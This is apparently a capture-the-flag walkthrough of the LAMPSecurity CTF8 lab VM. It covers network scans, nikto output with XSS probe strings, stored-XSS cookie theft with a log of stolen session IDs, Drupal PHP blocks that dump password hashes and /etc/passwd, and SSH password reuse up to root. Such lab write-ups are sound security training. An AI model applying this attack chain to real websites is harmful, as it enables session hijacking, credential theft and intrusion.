“The LAMPSecurity project is an effort to produce training and benchmarking tools that can be used to educate information security professionals and test products. Please note there are other capture the flag exercises (not just the latest one). Check the SourceForge site to find other exercises available here.”
“The secret of getting ahead is getting started.” –Mark twain
To start us off, let’s use arp-scan to ARP out across our local network and identify that the CTF8 box has leased the IP address 10.0.88.10.
calvinbebop@Dolos:~$ arp-scan -l Interface: eth0, datalink type: EN10MB (Ethernet) Starting arp-scan 1.9.5 with 256 hosts (https://github.com/royhills/arp-scan) 10.0.88.1 52:54:00:12:35:00 QEMU 10.0.88.3 08:00:27:99:07:fb Cadmus Computer Systems 10.0.88.2 52:54:00:12:35:00 QEMU 10.0.88.10 08:00:27:a5:48:e4 Cadmus Computer Systems 4 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.9.5: 256 hosts scanned in 2.530 seconds (101.19 hosts/sec). 4 responded
Initial Service Enumeration
Next up, we’ll use Nmap to initiate a full TCP SYN scan of the CTF8 box (10.0.88.10) and search for some potential attack vectors in the system. A complete description of the tool’s flag usage can be found here. We’ll start by using the following flags:
|-sS||Utilize a TCP SYN scan|
|-sV||Probe open ports to determine service/version info|
|-sC||Run the default set of service scripts|
|-A||Enable OS detection, version detection, script scanning, and traceroute|
|-p-||Target all TCP ports from 1-65535|
calvinbebop@Dolos:~$ sudo nmap -sS -sV -sC -A -p- 10.0.88.10 Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-22 15:05 CST Nmap scan report for 10.0.88.10 Host is up (0.00065s latency). PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.0.5 | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_drwxr-xr-x 2 0 0 4096 Jun 05 2013 pub | ftp-syst: | STAT: | FTP server status: | Connected to 10.0.88.5 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 1 | vsFTPd 2.0.5 - secure, fast, stable |_End of status 22/tcp open ssh OpenSSH 4.3 (protocol 2.0) | ssh-hostkey: | 1024 5e:ca:64:f0:7f:d2:1a:a2:86:c6:1f:c2:2a:b3:6b:27 (DSA) |_ 2048 a3:39:2d:9f:66:96:0d:82:ad:52:1f:a1:dc:b1:f1:54 (RSA) 25/tcp open smtp Sendmail | smtp-commands: localhost.localdomain Hello [10.0.88.5], pleased to meet you, ENHANCEDSTATUSCODES, PIPELINING, EXPN, VERB, 8BITMIME, SIZE, DSN, ETRN, DELIVERBY, HELP, |_ 2.0.0 This is sendmail 2.0.0 Topics: 2.0.0 HELO EHLO MAIL RCPT DATA 2.0.0 RSET NOOP QUIT HELP VRFY 2.0.0 EXPN VERB ETRN DSN AUTH 2.0.0 STARTTLS 2.0.0 For more info use "HELP <topic>". 2.0.0 To report bugs in the implementation see 2.0.0 http://www.sendmail.org/email-addresses.html 2.0.0 For local information send email to Postmaster at your site. 2.0.0 End of HELP info 80/tcp open http Apache httpd 2.2.3 ((CentOS)) |_http-favicon: Drupal CMS | http-robots.txt: 36 disallowed entries (15 shown) | /includes/ /misc/ /modules/ /profiles/ /scripts/ | /sites/ /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt | /INSTALL.pgsql.txt /install.php /INSTALL.txt /LICENSE.txt |_/MAINTAINERS.txt |_http-server-header: Apache/2.2.3 (CentOS) |_http-title: LAMPSecurity Research 443/tcp open ssl/https? |_ssl-date: 2018-12-22T21:05:36+00:00; 0s from scanner time. 445/tcp open netbios-ssn Samba smbd 3.0.33-3.7.el5 (workgroup: WORKGROUP) 920/tcp open status 1 (RPC #100024) 3306/tcp open mysql MySQL (unauthorized) 5801/tcp open vnc-http RealVNC 4.0 (resolution: 400x250; VNC TCP port: 5901) |_http-server-header: RealVNC/4.0 |_http-title: VNC viewer for Java 5901/tcp open vnc VNC (protocol 3.8) | vnc-info: | Protocol version: 3.8 | Security types: |_ VNC Authentication (2) MAC Address: 08:00:27:A5:48:E4 (Oracle VirtualBox virtual NIC) Running: Linux 2.6.X OS CPE: cpe:/o:linux:linux_kernel:2.6 OS details: Linux 2.6.9 - 2.6.30 Service Info: OS: Unix Host script results: |_clock-skew: mean: 1h40m01s, deviation: 2h53m14s, median: 0s |_nbstat: NetBIOS name: LAMPSEC, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown) | smb-os-discovery: | OS: Unix (Samba 3.0.33-3.7.el5) | Computer name: localhost | NetBIOS computer name: | Domain name: localdomain | FQDN: localhost.localdomain |_ System time: 2018-12-22T16:05:39-05:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) |_smb2-time: Protocol negotiation failed (SMB2)
FTP (21/TCP) Anonymous Access | Flag #1
One of the first things we may notice from the results of our Nmap scan is that not only is there an FTP service available, it also allows for an anonymous user login.
21/tcp open ftp vsftpd 2.0.5 | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_drwxr-xr-x 2 0 0 4096 Jun 05 2013 pub | ftp-syst: | STAT: | FTP server status: | Connected to 10.0.88.5 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 1 | vsFTPd 2.0.5 - secure, fast, stable |_End of status
Using Filezilla to login as the anonymous user, we are able to pull down our first flag!
Unfortunately, it does not look like we’re able to use the anonymous user for uploads though.
Status: Logged in Status: Starting upload of /var/www/html/reverseme.php Command: CWD /pub Response: 250 Directory successfully changed. Command: TYPE A Response: 200 Switching to ASCII mode. Command: PASV Response: 227 Entering Passive Mode (10,0,88,10,39,103) Command: STOR reverseme.php Response: 550 Permission denied. Error: Critical file transfer error
HTTP (80/TCP) Enumeration (Scanning)
Let’s go ahead and kick off a nikto scan of the web server in the background while we conduct a manual investigation of the site. There’s a plethora of useful information given to us from nikto, however we’ll focus on the manual investigation for now.
calvinbebop@Dolos:~$ nikto -h http://10.0.88.10 - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 10.0.88.10 + Target Hostname: 10.0.88.10 + Target Port: 80 + Start Time: 2018-12-22 16:15:42 (GMT-6) --------------------------------------------------------------------------- + Server: Apache/2.2.3 (CentOS) + Retrieved x-powered-by header: PHP/5.1.6 + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + OSVDB-3268: /scripts/: Directory indexing found. + OSVDB-3268: /includes/: Directory indexing found. + OSVDB-3268: /misc/: Directory indexing found. + OSVDB-3268: /modules/: Directory indexing found. + OSVDB-3268: /profiles/: Directory indexing found. + OSVDB-3268: /sites/: Directory indexing found. + OSVDB-3268: /themes/: Directory indexing found. + "robots.txt" contains 36 entries which should be manually viewed. + OSVDB-39272: favicon.ico file identifies this server as: Drupal 5.1.0 + Apache/2.2.3 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current. + Web Server returns a valid response with junk HTTP methods, this may cause false positives. + /phpinfo.php?VARIABLE=<script>alert('Vulnerable')</script>: Output from the phpinfo() function was found. + OSVDB-4806: /support/messages: Axis WebCam allows retrieval of messages file (/var/log/messages). See http://www.websec.org/adv/axis2400.txt.html + OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. + OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. + OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. + OSVDB-3092: /includes/: This might be interesting... + OSVDB-3092: /marketing/: This might be interesting... + OSVDB-3092: /misc/: This might be interesting... + OSVDB-3092: /sales/: This might be interesting... + OSVDB-3092: /support/: This might be interesting... + OSVDB-3092: /user/: This might be interesting... + OSVDB-3092: /scripts/: This might be interesting... possibly a system shell found. + OSVDB-3092: /manual/: Web server manual found. + OSVDB-3093: /mail/src/read_body.php: SquirrelMail found + OSVDB-3093: /webmail/src/read_body.php: SquirrelMail found + /phpinfo.php: Output from the phpinfo() function was found. + OSVDB-3268: /icons/: Directory indexing found. + OSVDB-3268: /manual/images/: Directory indexing found. + /phpinfo.php?GLOBALS[test]=<script>alert(document.cookie);</script>: Output from the phpinfo() function was found. + OSVDB-3092: /scripts/showuser.cgi: Shows the output of the 'whoami' command, which shows the web server user. + OSVDB-3092: /UPGRADE.txt: Default file found. + OSVDB-3092: /install.php: Drupal install.php file found. + OSVDB-3092: /xmlrpc.php: xmlrpc.php was found. + OSVDB-3233: /INSTALL.pgsql.txt: Drupal installation file found. + OSVDB-3233: /icons/README: Apache default file found. + /webmail/src/configtest.php: Squirrelmail configuration test may reveal version and system info. + OSVDB-3092: /.git/index: Git Index file may contain directory listing information. + /.git/HEAD: Git HEAD file found. Full repo details may be present. + OSVDB-81817: /?q=x: Drupal 7 contains a path information disclosure + /.git/config: Git config file found. Infos about repo details may be present. + 9175 requests: 0 error(s) and 80 item(s) reported on remote host + End Time: 2018-12-22 16:28:09 (GMT-6) (747 seconds) --------------------------------------------------------------------------- + 1 host(s) tested
HTTP (80/TCP) Enumeration (Manual) | Flag #2
Welcome to CTF8’s primary website, LAMPSecurity Research.
Checking in on the source of the home page, we’re able to find our second flag!
Navigating into one of the blog entries from the home page, we are able to see that the site allows for comment inputs from guests of the site.
In the spirit of breaking things, let’s attempt a basic test to check for XSS (Cross Site Scripting) vulnerabilities within the commenting system.
XSS Exploitation - Session Hijacking Attack
We’ll now attempt to use the XSS vulnerability we discovered to launch a session hijacking attack against the other user’s of the site. Firstly, we’ll need to setup an HTTP server on our local (attacker) machine to receive the incoming stolen session IDs/cookies.
calvinbebop@Dolos:~$ service apache2 start calvinbebop@Dolos:~$ service apache2 status ● apache2.service - The Apache HTTP Server Loaded: loaded (/lib/systemd/system/apache2.service; disabled; vendor preset: disabled) Active: active (running) since Sat 2018-12-22 17:27:06 CST; 34s ago Process: 28104 ExecStart=/usr/sbin/apachectl start (code=exited, status=0/SUCCESS) Main PID: 28108 (apache2) Tasks: 7 (limit: 4915) Memory: 14.1M CGroup: /system.slice/apache2.service ├─28108 /usr/sbin/apache2 -k start ├─28109 /usr/sbin/apache2 -k start ├─28110 /usr/sbin/apache2 -k start ├─28111 /usr/sbin/apache2 -k start ├─28112 /usr/sbin/apache2 -k start ├─28113 /usr/sbin/apache2 -k start └─28114 /usr/sbin/apache2 -k start
We can also see that this post was submitted by a user Barbara.
Using the site’s user contact page, we can send Barbara a link to the article to simulate a targeted attack.
After a few minutes, we can see our first batch of stolen cookies come in!
calvinbebop@Dolos:/var/log/apache2# sudo cat * | grep 22/Dec | grep -v "127.0.0.1" | grep -v "10.0.88.5" 10.0.88.10 - - [22/Dec/2018:18:12:02 -0600] "GET /SESSfc1bd34caa7d99af80db03d749397e53=j94qillr0ho22u8tafhq0bdvh4 HTTP/1.1" 404 553 "http://10.0.88.13/content/lampsec-point-security-available" "Mozilla/5.0 (Unknown; Linux i686) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.0 Safari/534.34" 10.0.88.10 - - [22/Dec/2018:18:12:07 -0600] "GET /SESSfc1bd34caa7d99af80db03d749397e53=1d6o64k3ri88fogkku75vao8v6;%20has_js=1 HTTP/1.1" 404 563 "http://10.0.88.13/content/lampsec-point-security-available" "Mozilla/5.0 (Unknown; Linux i686) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.0 Safari/534.34"
Using a cookie modification add-on for Firefox, we’re able to change our session ID value to the stolen value, 1d6o64k3ri88fogkku75vao8v6. This can also be accomplished using a proxy tool such as Burp.
And just like that, we’ve successfully hijacked Barbara’s session!
Exposing the Drupal Database
After hijacking Barbara’s web admin account, we now have the ability to create and post new content that includes PHP code. We’ll now attempt to create a post that contains PHP that will try to create a reverse webshell connection back to our attacker machine.
Unfortunately, it appears that the system account responsible for execution of this code has rather limited privileges as attempts to utilize PHP for connecting out via reverse webshell or opening a listening port to connect into the victim machine with both fail with a failure to daemonise error. However if we look closely though, we can identify that this server is running an instance of Drupal for its CMS.
Checking back to our intial web scans, we can actually find that Nikto identified this as an interesting point of investigation.
+ OSVDB-3092: /install.php: Drupal install.php file found.
Drupal also allows for dynamic code execution in Blocks. Let’s create a new block that will attempt to execute some PHP code to dump the usernames and passwords of every account in the Drupal database!
Using Hash-identifier (or an equivalent online tool), we’re able to determine that these are MD5 hashed strings.
calvinbebop@Dolos:~$ hash-identifier ######################################################################### # __ __ __ ______ _____ # # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # # By Zion3R # # www.Blackploit.com # # Root@Blackploit.com # ######################################################################### ------------------------------------------------------------------------- HASH: 25e4ee4e9229397b6b17776bfceaf8e7 Possible Hashs: [+] MD5 [+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))
Luckily for us, MD5 hashes are relatively easy to crack and numerous online sources are happy to provide the “decrypted” strings for provided hashes.
Rooted - User Account Password Reuse
After attempting to login to each account using the available first names and our new set of passwords, it looks like the server is configured with user accounts using a different naming convention than just first names. A good way to get a list of configured usernames is by retrieving the /etc/passwd which may be possible by adding an include statement to our malicious PHP code block.
Excluding the account names that have limited direct access to a shell (as shown by the /sbin/nologin), we have a pretty decent list of accounts to attempt to authenticate against. Working our way down the list with our newly acquired password list at the ready, we can pretty quickly find ourselves SSH’d into the server and escalating to root without hassle.
calvinbebop@Dolos:~# ssh email@example.com Welcome to LAMPSecurity Research SSH access! #flag#5e937c51b852e1ee90d42ddb5ccb8997 Unauthorized access is expected... firstname.lastname@example.org's password: Last login: Thu Mar 27 12:48:29 2014 from 192.168.56.1 #flag#motd-flag [spinkton@localhost ~]$ sudo su Password: [root@localhost spinkton]# id uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=user_u:system_r:unconfined_t
Thank you for sticking around for this week’s boot2root. I think this box quite nicely illustrates how dangerous password reuse can really be!
As always, if you have any questions, corrections, or comments, please feel free to reach out to me on Twitter and have yourself an excellent day!